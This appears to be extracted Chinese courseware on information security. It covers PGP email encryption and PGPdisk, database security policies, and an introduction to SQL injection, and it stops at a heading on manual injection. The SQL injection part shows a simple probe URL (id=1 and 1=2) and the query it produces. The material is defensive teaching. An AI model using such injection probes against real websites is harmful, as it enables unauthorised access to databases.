步驟2：單擊“GetSigningKeyfromServer”，將公鑰上傳到PGP公司的密鑰服務(wù)器上，會彈出“PGPServerProgress”對話框，等待完成。鼠標(biāo)右鍵，打開如圖7-2-19所示的菜單。子任務(wù)7-2-3加密電子郵件圖7-2-19“PGPDesktop–AllKeys”對話框任務(wù)7-2郵件加密與解密 步驟3：單擊“Export”菜單，打開如圖7-2-20所示“ExportKeytoFile”對話框，設(shè)置文件名，單擊“保存”按鈕，則將test.asc文件保存在桌面上，這就完成了導(dǎo)出公鑰。導(dǎo)出公鑰后，就可以將此公鑰放在自己的網(wǎng)站上或者將公鑰直接發(fā)給朋友，告訴他們以后發(fā)郵件或者重要文件的時，通過PGP使用此公鑰加密后再發(fā)給你，這樣做能更安全的保護(hù)自己的隱私或公司的秘密。子任務(wù)7-2-3加密電子郵件圖7-2-20“ExportKeytoFile”對話框任務(wù)7-2郵件加密與解密 步驟4：“密鑰對”中包含了一個公鑰（公用密鑰，可分發(fā)送給任何人，別人可以用這個密鑰對要發(fā)給你的文件或郵件進(jìn)行加密）和一個私鑰（私人密鑰，只有自己所有，不可公開分發(fā)，此密鑰用來解密別人用公鑰加密的文件或郵件）。步驟5：單擊“Properties”，打開如圖7-2-21所示“SignatureProperties”對話框，可查看相關(guān)信息。子任務(wù)7-2-3加密電子郵件圖7-2-21“SignatureProperties”對話框任務(wù)7-2郵件加密與解密 步驟6：單擊“ShowSigningKeyProperties”，打開如圖7-2-22所示“wxw-KeyProperties”對話框，查看或修改當(dāng)前用戶KEYSID加密信息。子任務(wù)7-2-3加密電子郵件圖7-2-22“wxw-KeyProperties”對話框任務(wù)7-2郵件加密與解密 （2）Green導(dǎo)入公鑰文件。步驟1：將來自Star的公鑰下載到自己的計算機(jī)上，雙擊對方發(fā)過來的擴(kuò)展名為.asc的公鑰文件，進(jìn)入“Selectkey(s)”對話框（見圖7-2-23），選中并右鍵，可看到該公鑰的基本屬性，如Validity（有效性，PGP系統(tǒng)檢查是否符合要求，如符合，就顯示為綠色）、Trust（信任度）、Size（大?。?、Description（描述）、KeyID（密鑰ID）、Creation（創(chuàng)建時間）、Expiration（到期時間）等，以便從中了解是否該導(dǎo)入此公鑰。如果當(dāng)前顯示的屬性中沒有這么多信息，則可以使用菜單組里的VIEW菜單，并選中里面的全部選項(xiàng)。子任務(wù)7-2-3加密電子郵件圖7-2-23“Selectkey(s)”對話框任務(wù)7-2郵件加密與解密 步驟2：選中需要導(dǎo)入的公鑰（也就是PGP中顯示出的對方的E-mail地址），單擊“Import”按鈕，即可導(dǎo)入該公鑰。當(dāng)圖7-2-22中的Trust未顯示或不符合要求時，需要簽名激活。則如步驟3和4操作所示。步驟3：選中導(dǎo)入的公鑰，鼠標(biāo)右鍵單擊，選中并單擊“Signas”選項(xiàng)，如圖7-2-24所示子任務(wù)7-2-3加密電子郵件圖7-2-24“Signas”選項(xiàng)任務(wù)7-2郵件加密與解密 步驟4：打開“PGPZipAssistant–SignandSave”對話框，如圖7-2-25所示。子任務(wù)7-2-3加密電子郵件圖7-2-25“PGPZipAssistant–SignandSave”對話框任務(wù)7-2郵件加密與解密 步驟5：在Passphrase文本框中輸入設(shè)置用戶時的密碼，如簽名設(shè)置的pgp_123，然后單擊“下一步”按鈕，即完成簽名操作。查看密碼列表里該公鑰的屬性，Trust由灰色轉(zhuǎn)變?yōu)榈膶傩?，說明這個公鑰被PGP加密系統(tǒng)正式接受，可以投入使用了。子任務(wù)7-2-3加密電子郵件任務(wù)7-2郵件加密與解密 2．加密電子郵件步驟1：選中要加密的文件pgp_e.txt，鼠標(biāo)右鍵單擊，在安裝有PGP程序后，彈出如圖7-2-26所示的菜單。子任務(wù)7-2-3加密電子郵件圖7-2-26“PGPDesktop”菜單任務(wù)7-2郵件加密與解密 步驟2：單擊子菜單，打開如圖7-2-27所示的“AddUserKeys”對話框，輸入用戶名或email地址。子任務(wù)7-2-3加密電子郵件圖7-2-27“PGPZipAssistant–AddUserKeys”對話框任務(wù)7-2郵件加密與解密 步驟3：單擊“下一步”，打開密鑰選擇對話框，選擇上部窗格中用于加密文件的公鑰，然后雙擊該公鑰添加到下部窗格中，單擊“下一步”按鈕，開始用對方提供的公鑰進(jìn)行加密，加密完成后生成一個新的加密文件，圖標(biāo)如圖所示。對方接到該文件后，雙擊打開，顯示如圖7-2-28所示內(nèi)容，不能識別。子任務(wù)7-2-3加密電子郵件圖7-2-28文檔內(nèi)容任務(wù)7-2郵件加密與解密 步驟4：如果使用記事本程序打開，則顯示如圖7-2-29所示的一堆亂碼，依然不能識別。子任務(wù)7-2-3加密電子郵件圖7-2-29“pgp_e.txt–記事本”對話框任務(wù)7-2郵件加密與解密 3．解密電子郵件選擇需解密的文件pgp_e.txt，鼠標(biāo)右鍵，在彈出的菜單中單擊。打開如圖7-2-30所示的“Enteroutputfilename”對話框，單擊“保存”按鈕，則可在保存的位置找到解密的文件。子任務(wù)7-2-3加密電子郵件圖7-2-30“Enteroutputfilename”對話框任務(wù)7-2郵件加密與解密 4．測試步驟1：發(fā)送加密的郵件。重新啟動OutLookExpress，在工具欄中會出現(xiàn)Encrypt（加密）、Sign（簽名）和Import（導(dǎo)入）幾個按鈕。如果沒有，請選擇“查看”→“工具欄”→“自定義”。寫一封測試信，單擊工具欄中的Encrypt和Sign按鈕，單擊“發(fā)送”按鈕，出現(xiàn)填寫密碼的對話框，在對話框中輸入密鑰設(shè)置的正確密碼，單擊OK按鈕，這就可發(fā)送一封加密的郵件。步驟2：接收郵件。郵件接收者在接到剛才發(fā)送的測試郵件時，看到的是一堆亂碼。子任務(wù)7-2-3加密電子郵件任務(wù)7-2郵件加密與解密 步驟3：解密郵件。收到郵件后，雙擊加密的信件，在工具欄按鈕中單擊Decrypt（解密）按鈕，在Passphraseofsigningkey對話框中輸入前面設(shè)置的密碼，單擊OK按鈕，即可對加密的信件進(jìn)行解密，此時正?？吹叫偶脑摹２襟E4：卸載（可選）。如果不需要再使用該軟件，可將它卸載。子任務(wù)7-2-3加密電子郵件學(xué)習(xí)目標(biāo)：知識目標(biāo)技能目標(biāo)態(tài)度目標(biāo)掌握創(chuàng)建PGPdisk并靈活使用能解決配置過程中出現(xiàn)的問題培養(yǎng)規(guī)范操作養(yǎng)成刻苦、勤奮、好問、獨(dú)立思考和細(xì)心檢查的學(xué)習(xí)習(xí)慣了解自解密文檔基本概念了解郵件加密和解密的基本概念7.1任務(wù)概述新天教育培訓(xùn)集團(tuán)在持續(xù)運(yùn)營一段時間后，各個員工的電腦上都堆積了大量的資料和數(shù)據(jù)。隨著文件的數(shù)量增加，這些重要的數(shù)據(jù)如何保護(hù)不被竊據(jù)、破解成為了難題。為此新天教育培訓(xùn)集團(tuán)前來拜訪天一研發(fā)中心，希望能夠得到滿意的一套解決方案。那么在服務(wù)器中應(yīng)該進(jìn)行哪些配置才能為天一研發(fā)中心解決上述問題呢？唐宇經(jīng)過憑借所學(xué)的知識他馬上想到了要滿足以上要求需要進(jìn)行文件的加密配置。7.2情境描述配置的流程怎樣？什么是自解密文檔？加密解密操作？為什么要創(chuàng)建PGPdisk？12347.3任務(wù)分析任務(wù)7-2郵件加密與解密 1.安全刪除文件有時候，不希望一些重要的數(shù)據(jù)留在系統(tǒng)里面，而簡單的刪除又不能防止數(shù)據(jù)可能被恢復(fù)，此時可以采用PGP的粉碎功能來安全擦除數(shù)據(jù)。鼠標(biāo)右鍵單擊要刪除的文件夾（或文件），在彈出的菜單中單擊子菜單，然后會彈出刪除文件確認(rèn)對話框，單擊“刪除”按鈕，即可完全刪除，不可恢復(fù)。2.創(chuàng)建自解密文檔上述所示的加密文件解密需要安裝PGP軟件，否則也不能解密，使用起來不是很方便，有沒有既能實(shí)現(xiàn)加密，又能破除PGP軟件的約束，這就是自解密文檔。子任務(wù)7-2-4PGP軟件其他應(yīng)用任務(wù)7-2郵件加密與解密 （1）加密本例中對pgp_e.txt文件創(chuàng)建自解密文檔。鼠標(biāo)右鍵pgp_e.txt文件，在彈出的菜單中選中并單擊。然后彈出“CreateaPassphrase”對話框，在該對話框中輸入密碼，單擊“確定”按鈕，出現(xiàn)保存對話框，選一個位置保存即可，即自解密文檔創(chuàng)建成功。子任務(wù)7-2-4PGP軟件其他應(yīng)用任務(wù)7-2郵件加密與解密 （2）解密在任意一臺沒有安裝PGP軟件的電腦上，雙擊自解密文件，打開如圖7-2-31所示的對話框，在下面文本框中輸入正確的密碼后，即可打開文件夾（或文件）。子任務(wù)7-2-4PGP軟件其他應(yīng)用圖7-2-31“PGPSelfDecryptingArchive–EnterPassphrase”對話框任務(wù)7-2郵件加密與解密 3.創(chuàng)建PGPdiskPGPdisk可以劃分出一部分的磁盤空間來存儲敏感數(shù)據(jù)。這部分磁盤空間用于創(chuàng)建一個稱為PGPdisk的卷。雖然PGPdisk卷是一個單獨(dú)的文件，但是PGPdisk卷卻非常像一個硬盤分區(qū)，來提供存儲文件和應(yīng)用程序。步驟1：單擊“程序”中的“PGPDesktop”，單擊左邊窗格欄中的“PGPDisk”，打開如圖7-2-32所示的“PGPDesktop-PGPDisk”對話框。子任務(wù)7-2-4PGP軟件其他應(yīng)用圖7-2-32“PGPDesktop-PGPDisk”對話框任務(wù)7-2郵件加密與解密 步驟2：單擊“NewVirtualDisk”按鈕，出現(xiàn)“PGPdisk位置和大小”對話框，如圖7-2-33所示，指定要存儲.pgd文件（這個.pgd文件在以后被裝配為一個卷，也可理解為一個分區(qū)，在需要時可以隨時裝配使用）的位置和容量大小。加密算法有3種：AES（256bits）、CAST5（128bits）和Twofish（256bits）。文件系統(tǒng)格式可以是NTFS或FAT?？梢愿鶕?jù)需要選擇“MountatStartup”復(fù)選框。子任務(wù)7-2-4PGP軟件其他應(yīng)用圖7-2-33“PGPDesktop-NewVirtualDisk”對話框任務(wù)7-2郵件加密與解密 步驟3：單擊“AddUserKey”鏈接，打開如圖7-2-34所示的“AddKeyUsers”對話框，增加公鑰訪問用戶。子任務(wù)7-2-4PGP軟件其他應(yīng)用圖7-2-34“AddKeyUsers”對話框任務(wù)7-2郵件加密與解密 步驟4：單擊“OK”按鈕，返回上一個界面(見圖3-2-33)，單擊右上角的“CREATE”按鈕，打開如圖7-2-35所示的“PGPEnterPassphraseforKey”對話框。子任務(wù)7-2-4PGP軟件其他應(yīng)用圖7-2-35“PGPEnterPassphraseforKey”對話框任務(wù)7-2郵件加密與解密 步驟5：在“Pleaseenterpassphrase：”文本框中輸入密碼，單擊“OK”按鈕。打開如圖7-2-36所示的對話框，等待進(jìn)程完成，會在計算機(jī)中創(chuàng)建一個虛擬磁盤。子任務(wù)7-2-4PGP軟件其他應(yīng)用圖7-2-36“PGPDesktop–NewPGP.pgd”對話框?qū)W習(xí)目標(biāo)：知識目標(biāo)技能目標(biāo)態(tài)度目標(biāo)能夠熟練配置數(shù)據(jù)庫能夠掌握注入攻擊的特征能夠靈活判斷數(shù)據(jù)庫的各種狀態(tài)能解決配置過程中出現(xiàn)的問題培養(yǎng)認(rèn)真細(xì)致的工作態(tài)度和工作作風(fēng)養(yǎng)成刻苦、勤奮、好問、獨(dú)立思考和細(xì)心檢查的學(xué)習(xí)習(xí)慣能與組員精誠合作，能正確面對他人的成功或失敗具有一定自學(xué)能力，分析問題、解決問題能力和創(chuàng)新的能力了解數(shù)據(jù)庫的基本知識了解數(shù)據(jù)庫安全防護(hù)的必要性掌握注入式攻擊的原理掌握數(shù)據(jù)庫系統(tǒng)安全策略8.1任務(wù)概述新天教育培訓(xùn)集團(tuán)在持續(xù)運(yùn)營一段時間后，服務(wù)器都增加了大量的資料和數(shù)據(jù)。這些數(shù)據(jù)統(tǒng)一由數(shù)據(jù)庫軟件進(jìn)行管理。但是新天教育部門主管擔(dān)心這些數(shù)據(jù)容易受到外部攻擊，特別是通過數(shù)據(jù)庫進(jìn)行攻擊。為此，新天教育培訓(xùn)集團(tuán)需要有效的安全防護(hù)手段。唐宇經(jīng)過憑借所學(xué)的知識他馬上想到了要滿足以上要求需要針對數(shù)據(jù)庫進(jìn)行安全配置。8.2情境描述配置的流程怎樣？什么是數(shù)據(jù)庫防護(hù)？什么是注入攻擊？怎樣配置數(shù)據(jù)庫系統(tǒng)安全防護(hù)？12348.3任務(wù)分析本項(xiàng)目的具體任務(wù)有哪些？5任務(wù)8-1SQL數(shù)據(jù)庫安全認(rèn)識 數(shù)據(jù)庫系統(tǒng)（DatabaseSystem，簡稱DBS），是為適應(yīng)數(shù)據(jù)處理的需要而發(fā)展起來的一種較為理想的數(shù)據(jù)處理系統(tǒng)，也是一個為實(shí)際可運(yùn)行的存儲、維護(hù)和應(yīng)用系統(tǒng)提供數(shù)據(jù)的軟件系統(tǒng)，是存儲介質(zhì)、處理對象和管理系統(tǒng)的集合體。1．?dāng)?shù)據(jù)庫系統(tǒng)組成數(shù)據(jù)庫系統(tǒng)組成結(jié)構(gòu)如圖8-1-1所示。數(shù)據(jù)庫由數(shù)據(jù)庫管理系統(tǒng)統(tǒng)一管理，數(shù)據(jù)的插入、修改和檢索均要通過數(shù)據(jù)庫管理系統(tǒng)進(jìn)行。數(shù)據(jù)管理員負(fù)責(zé)創(chuàng)建、監(jiān)控和維護(hù)整個數(shù)據(jù)庫，使數(shù)據(jù)能被任何有權(quán)使用的人有效使用。子任務(wù)8-1-1數(shù)據(jù)庫系統(tǒng)概述任務(wù)8-1SQL數(shù)據(jù)庫安全認(rèn)識 子任務(wù)8-1-1數(shù)據(jù)庫系統(tǒng)概述圖8-1-1數(shù)據(jù)庫系統(tǒng)組成結(jié)構(gòu)圖任務(wù)8-1SQL數(shù)據(jù)庫安全認(rèn)識 2．?dāng)?shù)據(jù)庫管理系統(tǒng)數(shù)據(jù)庫管理系統(tǒng)（databasemanagementsystem，DBMS）是數(shù)據(jù)庫系統(tǒng)的核心，是在操作系統(tǒng)支持下工作，解決如何科學(xué)地組織和存儲數(shù)據(jù)，如何高效獲取和維護(hù)數(shù)據(jù)的系統(tǒng)軟件。其主要功能包括：數(shù)據(jù)定義功能、數(shù)據(jù)操縱功能、數(shù)據(jù)庫的運(yùn)行管理和數(shù)據(jù)庫的建立與維護(hù)。子任務(wù)8-1-1數(shù)據(jù)庫系統(tǒng)概述任務(wù)8-1SQL數(shù)據(jù)庫安全認(rèn)識 3．常見數(shù)據(jù)庫系統(tǒng)常見數(shù)據(jù)庫系統(tǒng)如表所示。子任務(wù)8-1-1數(shù)據(jù)庫系統(tǒng)概述學(xué)習(xí)目標(biāo)：知識目標(biāo)技能目標(biāo)態(tài)度目標(biāo)能夠熟練配置數(shù)據(jù)庫能解決配置過程中出現(xiàn)的問題能與組員精誠合作，能正確面對他人的成功或失敗具有一定自學(xué)能力，分析問題、解決問題能力和創(chuàng)新的能力了解數(shù)據(jù)庫的基本知識了解數(shù)據(jù)庫安全防護(hù)的必要性8.1任務(wù)概述新天教育培訓(xùn)集團(tuán)在持續(xù)運(yùn)營一段時間后，服務(wù)器都增加了大量的資料和數(shù)據(jù)。這些數(shù)據(jù)統(tǒng)一由數(shù)據(jù)庫軟件進(jìn)行管理。但是新天教育部門主管擔(dān)心這些數(shù)據(jù)容易受到外部攻擊，特別是通過數(shù)據(jù)庫進(jìn)行攻擊。為此，新天教育培訓(xùn)集團(tuán)需要有效的安全防護(hù)手段。唐宇經(jīng)過憑借所學(xué)的知識他馬上想到了要滿足以上要求需要針對數(shù)據(jù)庫進(jìn)行安全配置。8.2情境描述什么是數(shù)據(jù)庫防護(hù)？了解數(shù)據(jù)庫相關(guān)概念？128.3任務(wù)分析任務(wù)8-1SQL數(shù)據(jù)庫安全認(rèn)識 數(shù)據(jù)庫技術(shù)是現(xiàn)代信息科學(xué)與技術(shù)的重要組成部分，是計算機(jī)數(shù)據(jù)處理與信息管理系統(tǒng)的核心，研究和解決了計算機(jī)信息處理過程中大量數(shù)據(jù)有效地組織和存儲的問題，在數(shù)據(jù)庫系統(tǒng)中減少數(shù)據(jù)存儲冗余、實(shí)現(xiàn)數(shù)據(jù)共享、保障數(shù)據(jù)安全以及高效地檢索數(shù)據(jù)和處理數(shù)據(jù)。其根本目標(biāo)是要解決數(shù)據(jù)的共享問題。數(shù)據(jù)庫技術(shù)涉及到許多基本概念，主要包括：信息，數(shù)據(jù)，數(shù)據(jù)處理，數(shù)據(jù)庫，數(shù)據(jù)庫管理系統(tǒng)以及數(shù)據(jù)庫系統(tǒng)等。子任務(wù)8-1-2數(shù)據(jù)庫技術(shù)任務(wù)8-1SQL數(shù)據(jù)庫安全認(rèn)識 1.數(shù)據(jù)數(shù)據(jù)（Data）是用于描述現(xiàn)實(shí)世界中各種具體事物或抽象概念的，可存儲并具有明確意義的符號，包括數(shù)字，文字，圖形和聲音等。2.數(shù)據(jù)處理數(shù)據(jù)處理是指對各種形式的數(shù)據(jù)進(jìn)行收集、存儲、加工和傳播的一系列活動的總和。一方面是從大量的，原始的數(shù)據(jù)中抽取、推導(dǎo)出對人們有價值的信息以作為行動和決策的依據(jù)；另一方面是為了借助計算機(jī)技術(shù)科學(xué)地保存和管理復(fù)雜的、大量的數(shù)據(jù)，以便人們能夠方便而充分地利用信息資源.3.數(shù)據(jù)庫數(shù)據(jù)庫（DataBase,DB）是存儲在計算機(jī)輔助存儲器中的、有組織的、可共享的相關(guān)數(shù)據(jù)集合子任務(wù)8-1-2數(shù)據(jù)庫技術(shù)任務(wù)8-1SQL數(shù)據(jù)庫安全認(rèn)識 4.數(shù)據(jù)庫管理系統(tǒng)數(shù)據(jù)庫管理系統(tǒng)（DataBaseManagementSystem，DBMS）是對數(shù)據(jù)庫進(jìn)行管理的系統(tǒng)軟件，用于有效組織和存儲數(shù)據(jù)、獲取和管理數(shù)據(jù)、接受和完成用戶提出的各種數(shù)據(jù)訪問請求。能支持關(guān)系型數(shù)據(jù)模型的數(shù)據(jù)庫管理系統(tǒng)，稱為關(guān)系型數(shù)據(jù)庫管理系統(tǒng)（RelationalDataBaseManagementSystem，RDBMS).子任務(wù)8-1-2數(shù)據(jù)庫技術(shù)學(xué)習(xí)目標(biāo)：知識目標(biāo)技能目標(biāo)態(tài)度目標(biāo)能夠靈活判斷數(shù)據(jù)庫的各種狀態(tài)能解決配置過程中出現(xiàn)的問題培養(yǎng)認(rèn)真細(xì)致的工作態(tài)度和工作作風(fēng)養(yǎng)成刻苦、勤奮、好問、獨(dú)立思考和細(xì)心檢查的學(xué)習(xí)習(xí)慣了解數(shù)據(jù)庫的基本知識了解數(shù)據(jù)庫安全防護(hù)的必要性掌握數(shù)據(jù)庫系統(tǒng)安全策略8.1任務(wù)概述新天教育培訓(xùn)集團(tuán)在持續(xù)運(yùn)營一段時間后，服務(wù)器都增加了大量的資料和數(shù)據(jù)。這些數(shù)據(jù)統(tǒng)一由數(shù)據(jù)庫軟件進(jìn)行管理。但是新天教育部門主管擔(dān)心這些數(shù)據(jù)容易受到外部攻擊，特別是通過數(shù)據(jù)庫進(jìn)行攻擊。為此，新天教育培訓(xùn)集團(tuán)需要有效的安全防護(hù)手段。唐宇經(jīng)過憑借所學(xué)的知識他馬上想到了要滿足以上要求需要針對數(shù)據(jù)庫進(jìn)行安全配置。8.2情境描述什么是數(shù)據(jù)庫系統(tǒng)？數(shù)據(jù)庫系統(tǒng)安全防護(hù)策略有哪些？怎樣配置數(shù)據(jù)庫系統(tǒng)安全防護(hù)？1238.3任務(wù)分析任務(wù)8-1SQL數(shù)據(jù)庫安全認(rèn)識 1.系統(tǒng)安全策略系統(tǒng)安全策略包括了數(shù)據(jù)庫用戶管理、數(shù)據(jù)庫操作規(guī)范、用戶認(rèn)證、操作系統(tǒng)安全4個部分。（1）數(shù)據(jù)庫用戶管理。數(shù)據(jù)庫用戶對信息訪問的最直接途徑就是通過用戶訪問。因此需要對用戶進(jìn)行嚴(yán)格的管理，只有真正可信的人員才擁有管理數(shù)據(jù)庫用戶的權(quán)限。（2）數(shù)據(jù)庫操作規(guī)范。數(shù)據(jù)庫中數(shù)據(jù)才是核心，不能有任何的破壞，數(shù)據(jù)庫管理員是唯一能直接訪問數(shù)據(jù)庫的人員，管理員的操作是非常重要的，因此需要對數(shù)據(jù)庫維護(hù)人員培訓(xùn)，樹立嚴(yán)謹(jǐn)?shù)墓ぷ鲬B(tài)度，同時需要規(guī)范操作流程。子任務(wù)8-1-3數(shù)據(jù)庫系統(tǒng)安全策略任務(wù)8-1SQL數(shù)據(jù)庫安全認(rèn)識 （3）用戶身份認(rèn)證。從安全角度出發(fā)，防止欺騙性連接。

（4）操作系統(tǒng)安全。對于運(yùn)行任何一種數(shù)據(jù)庫的操作系統(tǒng)來說，都需要考慮安全問題。數(shù)據(jù)庫管理員以及系統(tǒng)賬戶的口令都必須符合規(guī)定，不能過于簡單而且需要定期的更換口令，對于口令的安全同樣重要。系統(tǒng)管理員維護(hù)操作系統(tǒng)時，需要與數(shù)據(jù)庫管理員合作，避免泄密。子任務(wù)8-1-3數(shù)據(jù)庫系統(tǒng)安全策略任務(wù)8-1SQL數(shù)據(jù)庫安全認(rèn)識 2.數(shù)據(jù)安全策略數(shù)據(jù)安全策略決定了可以訪問特定數(shù)據(jù)的用戶組，以及這些用戶的操作權(quán)限。數(shù)據(jù)的安全性取決于數(shù)據(jù)的敏感程度，如果數(shù)據(jù)不是那么敏感，則數(shù)據(jù)的安全策略則可以稍微松一些；反之則需要制定特定的安全策略，嚴(yán)格的控制訪問對象，確保數(shù)據(jù)的安全。子任務(wù)8-1-3數(shù)據(jù)庫系統(tǒng)安全策略任務(wù)8-1SQL數(shù)據(jù)庫安全認(rèn)識 3.用戶安全策略用戶安全策略是由一般用戶安全、最終用戶安全、管理員安全、應(yīng)用程序及開發(fā)人員安全、應(yīng)用程序管理員安全5個部分組成。

（1）一般用戶安全。如果對于用戶的認(rèn)證由數(shù)據(jù)庫進(jìn)行管理，則安全管理員就應(yīng)該制定口令安全策略來維護(hù)數(shù)據(jù)庫訪問的安全性。（2）最終用戶安全。安全管理員必須為最終用戶安全制定策略。如果使用的是大型數(shù)據(jù)庫同時還有許多用戶，這是就需要安全管理員對用戶組進(jìn)行分類，為每個用戶組創(chuàng)建用戶角色，并且對每個角色授予相應(yīng)的權(quán)限。任務(wù)1-3數(shù)據(jù)庫系統(tǒng)安全策略任務(wù)8-1SQL數(shù)據(jù)庫安全認(rèn)識 （3）管理員安全。安全管理員應(yīng)當(dāng)擁有闡述管理員安全的策略。在數(shù)據(jù)庫創(chuàng)建后，應(yīng)對SYS和SYSTEM用戶名更改口令，以防止對數(shù)據(jù)庫的未認(rèn)證訪問，且只有數(shù)據(jù)庫管理員才可用。（4）應(yīng)用程序開發(fā)人員安全。安全管理員必須為使用數(shù)據(jù)庫的應(yīng)用程序開發(fā)人員制定一套特殊的安全策略。安全管理員可以把創(chuàng)建必要對象的權(quán)限授予應(yīng)用程序開發(fā)人員。反之，創(chuàng)建對象的權(quán)限只能授予數(shù)據(jù)庫管理員，他從開發(fā)人員那里接收對象創(chuàng)建請求.

（5）應(yīng)用程序管理員安全。在有許多數(shù)據(jù)庫應(yīng)用程序的大型數(shù)據(jù)庫系統(tǒng)中，可以設(shè)立應(yīng)用程序管理員。任務(wù)1-3數(shù)據(jù)庫系統(tǒng)安全策略任務(wù)8-1SQL數(shù)據(jù)庫安全認(rèn)識 4.口令安全策略口令管理包括賬戶鎖定、口令老化及到期、口令歷史記錄、口令復(fù)雜性校驗(yàn)。（1）賬戶鎖定。當(dāng)某一特定用戶超過了失敗登錄嘗試的指定次數(shù)，服務(wù)器會自動鎖定這個用戶賬戶。（2）口令老化及到期。DBA使用CREATEPROFILE語句指定口令的最大生存期，當(dāng)?shù)竭_(dá)了指定的時間長度則口令到期，用戶或DBA必須變更口令。（3）口令歷史記錄。DBA使用CREATEPROFILE語句指定時間間隔，在這一間隔內(nèi)用戶不能重用口令。（4）口令復(fù)雜性校驗(yàn)?？诹钤O(shè)置必須滿足復(fù)雜性要求。任務(wù)1-3數(shù)據(jù)庫系統(tǒng)安全策略學(xué)習(xí)目標(biāo)：知識目標(biāo)技能目標(biāo)態(tài)度目標(biāo)能夠熟練配置數(shù)據(jù)庫能夠掌握注入攻擊的特征能夠靈活判斷數(shù)據(jù)庫的各種狀態(tài)能解決配置過程中出現(xiàn)的問題培養(yǎng)認(rèn)真細(xì)致的工作態(tài)度和工作作風(fēng)養(yǎng)成刻苦、勤奮、好問、獨(dú)立思考和細(xì)心檢查的學(xué)習(xí)習(xí)慣能與組員精誠合作，能正確面對他人的成功或失敗具有一定自學(xué)能力，分析問題、解決問題能力和創(chuàng)新的能力了解數(shù)據(jù)庫的基本知識了解數(shù)據(jù)庫安全防護(hù)的必要性掌握注入式攻擊的原理掌握數(shù)據(jù)庫系統(tǒng)安全策略8.1任務(wù)概述新天教育培訓(xùn)集團(tuán)在持續(xù)運(yùn)營一段時間后，服務(wù)器都增加了大量的資料和數(shù)據(jù)。這些數(shù)據(jù)統(tǒng)一由數(shù)據(jù)庫軟件進(jìn)行管理。但是新天教育部門主管擔(dān)心這些數(shù)據(jù)容易受到外部攻擊，特別是通過數(shù)據(jù)庫進(jìn)行攻擊。為此，新天教育培訓(xùn)集團(tuán)需要有效的安全防護(hù)手段。唐宇經(jīng)過憑借所學(xué)的知識他馬上想到了要滿足以上要求需要針對數(shù)據(jù)庫進(jìn)行安全配置。8.2情境描述配置的流程怎樣？了解數(shù)據(jù)庫注入的成因？什么是注入攻擊？知道數(shù)據(jù)庫注入的類型？12348.3任務(wù)分析任務(wù)8-2SQL注入攻擊 SQL注入是指攻擊者通過注入惡意的SQL命令，破壞SQL查詢語句的結(jié)構(gòu)，從而達(dá)到執(zhí)行惡意SQL語句的目的。SQL注入漏洞仍是目前比較常見的Web漏洞之一。1.SQL注入的成因SQL注入的產(chǎn)生其實(shí)是應(yīng)用程序?qū)τ脩敉ㄟ^瀏覽器提交的變量內(nèi)容沒有進(jìn)行檢查和過濾，直接查詢數(shù)據(jù)庫，導(dǎo)致返回數(shù)據(jù)庫中其他內(nèi)容。樣例如圖8-3-1所示。假設(shè)數(shù)據(jù)庫中有個名為customers的表，該表中存儲id號、用戶名、密碼等。（轉(zhuǎn)下頁）子任務(wù)8-2-1SQL注入概述任務(wù)8-2SQL注入攻擊 樣例如圖8-3-1所示。假設(shè)數(shù)據(jù)庫中有個名為customers的表，該表中存儲id號、用戶名、密碼等。子任務(wù)8-2-1SQL注入概述圖8-3-1注入過程示意圖任務(wù)8-2SQL注入攻擊 子任務(wù)8-2-1SQL注入概述圖中各序號所代表的含義如下所示。1

構(gòu)造測試語句。在瀏覽器地址欄中輸入http://IP地址/?id=1and1=22Web應(yīng)用收到語句請求后，沒有對id參數(shù)進(jìn)行過濾3

數(shù)據(jù)庫會收到“selectname，passwordfromcustomerswhereid=1and1=2”的查詢請求，簡單起見，也可以是select*fromcustomerswhereid=1and1=24

數(shù)據(jù)庫服務(wù)器返回該語句的查詢結(jié)果5Web應(yīng)用服務(wù)器將后臺數(shù)據(jù)庫服務(wù)器的處理結(jié)果返回給測試用戶6測試用戶獲取相應(yīng)信息任務(wù)8-2SQL注入攻擊 2.SQL注入的類型SQL注入常見分類方式主要有三種種，一種是根據(jù)注入點(diǎn)類型來分類，另一種是根據(jù)數(shù)據(jù)提交方式來分類，還有一種是根據(jù)執(zhí)行效果來分類。（1）根據(jù)注入點(diǎn)類型劃分具體情況如表所示。子任務(wù)8-2-1SQL注入概述任務(wù)8-2SQL注入攻擊 （2）根據(jù)數(shù)據(jù)提交方式劃分具體情況如表所示。子任務(wù)8-2-1SQL注入概述任務(wù)8-2SQL注入攻擊 （3）根據(jù)執(zhí)行效果劃分具體情況如表所示。子任務(wù)8-2-1SQL注入概述任務(wù)8-2SQL注入攻擊 4.SQL注入的危害SQL注入攻擊是黑客對數(shù)據(jù)庫進(jìn)行攻擊的常用手段之一。隨著B/S模式應(yīng)用開發(fā)的發(fā)展，使用這種模式編寫應(yīng)用程序的程序員越來越多。但是由于程序員的水平及經(jīng)驗(yàn)也參差不齊，在編寫代碼的時候，沒有對用戶輸入數(shù)據(jù)的合法性進(jìn)行判斷，使應(yīng)用程序存在安全隱患。常見的危害包括獲取管理員賬號密碼、盜取數(shù)據(jù)庫中的數(shù)據(jù)、修改數(shù)據(jù)庫中的數(shù)據(jù)、獲取Webshell等等。子任務(wù)8-2-1SQL注入概述學(xué)習(xí)目標(biāo)：知識目標(biāo)技能目標(biāo)態(tài)度目標(biāo)能夠熟練配置數(shù)據(jù)庫能夠掌握注入攻擊的特征能夠靈活判斷數(shù)據(jù)庫的各種狀態(tài)能解決配置過程中出現(xiàn)的問題培養(yǎng)認(rèn)真細(xì)致的工作態(tài)度和工作作風(fēng)養(yǎng)成刻苦、勤奮、好問、獨(dú)立思考和細(xì)心檢查的學(xué)習(xí)習(xí)慣能與組員精誠合作，能正確面對他人的成功或失敗具有一定自學(xué)能力，分析問題、解決問題能力和創(chuàng)新的能力了解數(shù)據(jù)庫的基本知識了解數(shù)據(jù)庫安全防護(hù)的必要性掌握注入式攻擊的原理掌握數(shù)據(jù)庫系統(tǒng)安全策略8.1任務(wù)概述新天教育培訓(xùn)集團(tuán)在持續(xù)運(yùn)營一段時間后，服務(wù)器都增加了大量的資料和數(shù)據(jù)。這些數(shù)據(jù)統(tǒng)一由數(shù)據(jù)庫軟件進(jìn)行管理。但是新天教育部門主管擔(dān)心這些數(shù)據(jù)容易受到外部攻擊，特別是通過數(shù)據(jù)庫進(jìn)行攻擊。為此，新天教育培訓(xùn)集團(tuán)需要有效的安全防護(hù)手段。唐宇經(jīng)過憑借所學(xué)的知識他馬上想到了要滿足以上要求需要針對數(shù)據(jù)庫進(jìn)行安全配置。8.2情境描述配置的流程怎樣？什么是手工注入？手工注入的應(yīng)用場合？手工注入